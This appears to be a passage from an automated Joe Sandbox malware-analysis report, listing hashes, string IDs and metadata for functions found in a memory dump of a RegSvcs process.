                            • Opcode Fuzzy Hash: 66d5032d3a7f1ef1aa4f0c935db5c95fa1742f8182a2f6b975b8fac668d3c200
                            • Instruction Fuzzy Hash: F11133B1C106599BDB10DF9AC444BEEFBF4EF08320F11822AD818A7240D378A944CFE1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: 2f0bc63399e91b909348b8f0e1b42bd6e60d0b22c60ce3f95db3315608ec600a
                            • Instruction ID: 97b1be015fd42f75c4621713fb13f9834d6e6cf6df2f8f164577afa60c0f92a7
                            • Opcode Fuzzy Hash: 2f0bc63399e91b909348b8f0e1b42bd6e60d0b22c60ce3f95db3315608ec600a
                            • Instruction Fuzzy Hash: F7B16C70E2026AEFDF11DFACC8817DDBBF1AF88314F148129D918A7254EB749885CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            [Control-flow graph rendered as an image; basic blocks 1223e74 through 1224180, including calls to 1220ab8. Node and edge list not reproduced here.]
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: e25e0f288f7d905925ccb3b735ac20ed5c1bc80b4c28600450add4df99728221
                            • Instruction ID: a181a200d5fc7356013a6334bbe5e09be86c0e23a7f1fca290b4c6cbe9ddf61f
                            • Opcode Fuzzy Hash: e25e0f288f7d905925ccb3b735ac20ed5c1bc80b4c28600450add4df99728221
                            • Instruction Fuzzy Hash: 37A19070E1025AEFDF10DFA8D981BDDBBF1BF58304F248129E505A7254DB789886CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            [Control-flow graph rendered as an image; basic blocks 1224810 through 1224a5c, including calls to 1220ab8. Node and edge list not reproduced here.]
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: a880377d0c22c416439db542b17d362d099533b74b17667833b949e674d10dc9
                            • Instruction ID: 78f4623faa47ce4040e7d3693f521366ae180a62bd233406914bc221d7724877
                            • Opcode Fuzzy Hash: a880377d0c22c416439db542b17d362d099533b74b17667833b949e674d10dc9
                            • Instruction Fuzzy Hash: 4A71B0B0E1029ADFDF10DFA9C88179DBBF2BF88314F148129E515A7254EB749841CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: b892567a48a174a8d5574e15727fa690d06307c3d7f752106b8490acecfbec85
                            • Instruction ID: 20210789c2c618c1be85914171c67fca18e2a573a95292281af580500648f81b
                            • Opcode Fuzzy Hash: b892567a48a174a8d5574e15727fa690d06307c3d7f752106b8490acecfbec85
                            • Instruction Fuzzy Hash: F371ADB0E1029ADFDF10DFA9C8817DDBBF1BF88314F148129E915A7250EB749842CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q$LR]q
                            • API String ID: 0-3917262905
                            • Opcode ID: 5ad57a53aa4a746323508b263976495b827158aae1e79d8fbc86c4768576ad74
                            • Instruction ID: e108d10f1e393e55b50d80ce7ced27d9e4fbbe66e07f167d4ab76a323658a01a
                            • Opcode Fuzzy Hash: 5ad57a53aa4a746323508b263976495b827158aae1e79d8fbc86c4768576ad74
                            • Instruction Fuzzy Hash: EA511231A20216AFDB15CF78C4507AEB7B2FF8A304F208469E846EB341DB759C46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: 35cee817e1ed9bf8fdfcc54fe26564a546edbbfd05e3d8ac6537e1dbecf7033d
                            • Instruction ID: 284c43e7d3c049e6e820d108c856c7b3e72d5cd54aea1a72176eb2c5877ae32e
                            • Opcode Fuzzy Hash: 35cee817e1ed9bf8fdfcc54fe26564a546edbbfd05e3d8ac6537e1dbecf7033d
                            • Instruction Fuzzy Hash: 68513471D202299FDB18CFA9C885BADFBF1BF48304F148129E819BB391D774A841CB95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS$kfS
                            • API String ID: 0-607643310
                            • Opcode ID: 7a71ae412c57bc4841b0f11ff5385e2fd8ee9f855734872d34e1dd2e1b17596a
                            • Instruction ID: 6d61d6d26d07bb832989b821a0ccd7fe8d491fa30c1e4c32b8ab48c76c64a77e
                            • Opcode Fuzzy Hash: 7a71ae412c57bc4841b0f11ff5385e2fd8ee9f855734872d34e1dd2e1b17596a
                            • Instruction Fuzzy Hash: B8513471D202299FDB18CFA9C885B9DBBF1BF48704F148129E819BB391D774A841CF95
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: PH]q
                            • API String ID: 0-3168235125
                            • Opcode ID: 9c8a6b24ff21df5d6fcb1203e491c548b089887f58ec781301eb63e1a5602b1f
                            • Instruction ID: 8e895264e9eac9930b4204f09391f2e57666c10511056fa93c6e503df90ac038
                            • Opcode Fuzzy Hash: 9c8a6b24ff21df5d6fcb1203e491c548b089887f58ec781301eb63e1a5602b1f
                            • Instruction Fuzzy Hash: 933124307102129FDB09AF78D26066E3BF2EF88240F108579E546DB389DE75DC4ACB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: PH]q
                            • API String ID: 0-3168235125
                            • Opcode ID: 1a1c35ca69e898b8a30cc5a39243b28859cae05a6a3b70406badd634ec2802b3
                            • Instruction ID: 5c80995d4fad088c634590c3c2a9732b467dabc6dd08eb1b6c91a19041ff3335
                            • Opcode Fuzzy Hash: 1a1c35ca69e898b8a30cc5a39243b28859cae05a6a3b70406badd634ec2802b3
                            • Instruction Fuzzy Hash: DD3104307102129FDB19AB38D66466F3BF6EF84240F208538E506DB389DE75DC4ACB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: 149a4d14ebeaa6fa503e9f2be4fee8950306e699ae5ae01a8ef76474ee2a7618
                            • Instruction ID: 82f91f40bd80289484f58cc2de82962a681960fa34b248f01066603807d75f21
                            • Opcode Fuzzy Hash: 149a4d14ebeaa6fa503e9f2be4fee8950306e699ae5ae01a8ef76474ee2a7618
                            • Instruction Fuzzy Hash: E3316135E2021AAFDF15CFA9C440BAEB7B1FF95300F608525E906EB240EB75A945CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS
                            • API String ID: 0-647291951
                            • Opcode ID: 090edddaa51e3fd7a903d97cc93c81463af4c278ac7944c62a7f436ed215e188
                            • Instruction ID: 0570950095fa6283308818f571c18f6b2bb70877dfbabc564abb2f3b3a9a4479
                            • Opcode Fuzzy Hash: 090edddaa51e3fd7a903d97cc93c81463af4c278ac7944c62a7f436ed215e188
                            • Instruction Fuzzy Hash: 9141FFB0D00249EFDB14CFA9C580ADEBFB5FF48314F248029E809AB254DB759946CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: kfS
                            • API String ID: 0-647291951
                            • Opcode ID: 53effc8cf1f04d60137b2b4966bb309a09e1a4464f224daec06c64b205e29ca4
                            • Instruction ID: 48a75fed31686d4271e1eba4d1ee9d066fde94bbead34905785c23cda5ccb5b1
                            • Opcode Fuzzy Hash: 53effc8cf1f04d60137b2b4966bb309a09e1a4464f224daec06c64b205e29ca4
                            • Instruction Fuzzy Hash: 4341EDB0D10249EFDB14DFA9C584ADEBFB5FF48310F248029E809AB254DB75A945CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID: LR]q
                            • API String ID: 0-3081347316
                            • Opcode ID: b1265f30110d98965fb79a556897b07234528a2d9c4184eae715889f1daff8db
                            • Instruction ID: 6401f798fdd4634b8ccbee5686b6abc91394f5b8a31d9b6711b27bafd4e27979
                            • Opcode Fuzzy Hash: b1265f30110d98965fb79a556897b07234528a2d9c4184eae715889f1daff8db
                            • Instruction Fuzzy Hash: DC1193316092819FC3165F7884641AE7FB2EF8B210B0544EBC8C5CF392DA355C4AC792
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 576d9fd4e4012c10d4d68d5864c0c25fe81874e33a5903a664a4916d8d15c017
                            • Instruction ID: ceb0c9053613c9412c799afa250fb3725f97db12a4d89899b71de0412a920fa0
                            • Opcode Fuzzy Hash: 576d9fd4e4012c10d4d68d5864c0c25fe81874e33a5903a664a4916d8d15c017
                            • Instruction Fuzzy Hash: C4127130710212DFDB19AB3CE49466D33AAFB85304B145A38E646CBB65CF76EC4AC791
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9b7373efa10b72f957e3d8fa1aaae9d546487216a07e7d82c0ad422c9ad8922b
                            • Instruction ID: e4f4c5643a9930ab62bd85a60262fa78254d04a5e904a7aa1427e8b9b17b96d2
                            • Opcode Fuzzy Hash: 9b7373efa10b72f957e3d8fa1aaae9d546487216a07e7d82c0ad422c9ad8922b
                            • Instruction Fuzzy Hash: 6A91AD34A101259FDF25DF68D584AADBBF6EF88314F148529E906DB3A5DB30EC82CB40
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e83e6f2b08f4c71fd96f90c919ab29328afe375c9f49c7629f59ca09e4114fe2
                            • Instruction ID: 0f212d866b0308aa39d8e346e8638ddaa85caa76ba4900bec8751b2d3c7d6ef1
                            • Opcode Fuzzy Hash: e83e6f2b08f4c71fd96f90c919ab29328afe375c9f49c7629f59ca09e4114fe2
                            • Instruction Fuzzy Hash: 44510130902152CFCB0AFF7AF9849443FA5FB563083048B69D2419727ED77A7989DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 59c82f083ac3bdde23b51d9b15eb505ca22d88bee6f71dff9f7acb74d1cbef7c
                            • Instruction ID: 01274a9175b5f1ac3015afd001448fb5b654f1b81dd3b1d54728f16e6de54525
                            • Opcode Fuzzy Hash: 59c82f083ac3bdde23b51d9b15eb505ca22d88bee6f71dff9f7acb74d1cbef7c
                            • Instruction Fuzzy Hash: ED51DC30A12162CFCB09FF7AF9849443FA5FB553083008B69D2419B27DDB7A7989DB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f758bb7ac57616d1d5a8e53ce8e546981ddeec988bf9637556d814f962f63a9d
                            • Instruction ID: f46b41aa54f9902bfc373d000617f3e04e4f038486f8d091bc87e1c903580543
                            • Opcode Fuzzy Hash: f758bb7ac57616d1d5a8e53ce8e546981ddeec988bf9637556d814f962f63a9d
                            • Instruction Fuzzy Hash: D331B030E102169BDB05CFA9C59469EBBB6FF8A300F10C529E846EB350DF70AC46CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 604db47d9ed893588c12a4c565ea4811c908706db32818f3a22d96380779f67b
                            • Instruction ID: 76dbe8efd5277545f95baa8ed8526c990cbfe5b8f43a264a561481d3430b2fd5
                            • Opcode Fuzzy Hash: 604db47d9ed893588c12a4c565ea4811c908706db32818f3a22d96380779f67b
                            • Instruction Fuzzy Hash: FC318F35E102169BDB09CFA9D59469EBBB6FF89300F10C529E916EB350DF70AC46CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 36eb04488e4a00f375fc0f890b14193b284156d90fd421ed22017671f484729b
                            • Instruction ID: 3254a18d49750414c69a4d85d4338781c7212bc4760b4723577a523e3abd2132
                            • Opcode Fuzzy Hash: 36eb04488e4a00f375fc0f890b14193b284156d90fd421ed22017671f484729b
                            • Instruction Fuzzy Hash: D731B331E102269BDF05CFA9D49469EB7B2FF8A304F14C61AE905EB241DB719885CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 32bbd29433d40f63759525ae5c380eee97537035a106eab299d0c6fa6047bfa2
                            • Instruction ID: a2eb98ceb1ecd03b93266213c8535b45c396f85e00d1e3dc6066418251151d55
                            • Opcode Fuzzy Hash: 32bbd29433d40f63759525ae5c380eee97537035a106eab299d0c6fa6047bfa2
                            • Instruction Fuzzy Hash: 8F21F9345100226FDF27AB6DF844F6D3759EB45308F004A65D105C726ADB29DD96CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 5157a49c3c26ef9f190d21ef05967d4432877eac33464bf20cf4dd143f08b13e
                            • Instruction ID: c9063c596b900944d0e6c9f8f4ebcb6b49c93d84d0362d5bd517b4842a3a7486
                            • Opcode Fuzzy Hash: 5157a49c3c26ef9f190d21ef05967d4432877eac33464bf20cf4dd143f08b13e
                            • Instruction Fuzzy Hash: E921B631E102269BDF05CFA9D49069EF7B6FF8A304F14C619E905EB340DB71A886CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11c15ff103e70b020a785b0ab8dccd0da77b8fcb887146394d7137b8c805ddc6
                            • Instruction ID: 160f3d8e27c85659bda7d475ce7939a8a594947c2060bba48a6ef3fe4783cacd
                            • Opcode Fuzzy Hash: 11c15ff103e70b020a785b0ab8dccd0da77b8fcb887146394d7137b8c805ddc6
                            • Instruction Fuzzy Hash: 6321F930E14226EBDF09CFA5D4545DEF7B2AF85304F10851AE915FB340DB709886CB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 0000000C.00000002.3275034134.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_1220000_RegSvcs.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 529f74e74f1357b5788c833a58f755693431050e1697b2f7135ad2eb4f1fb1be
                            • Instruction ID: 96ba27dea0265f0521352b59d31b6bc77c7c0e910d1357355205d08589f58731
                            • Opcode Fuzzy Hash: 529f74e74f1357b5788c833a58f755693431050e1697b2f7135ad2eb4f1fb1be
                            • Instruction Fuzzy Hash: 81212A30610125DFCB54EF79C958AAD7BF1EF4D304B1044A8E946EB365DB3A9D05CB90
                            Uniqueness

                            Uniqueness Score: -1.00%
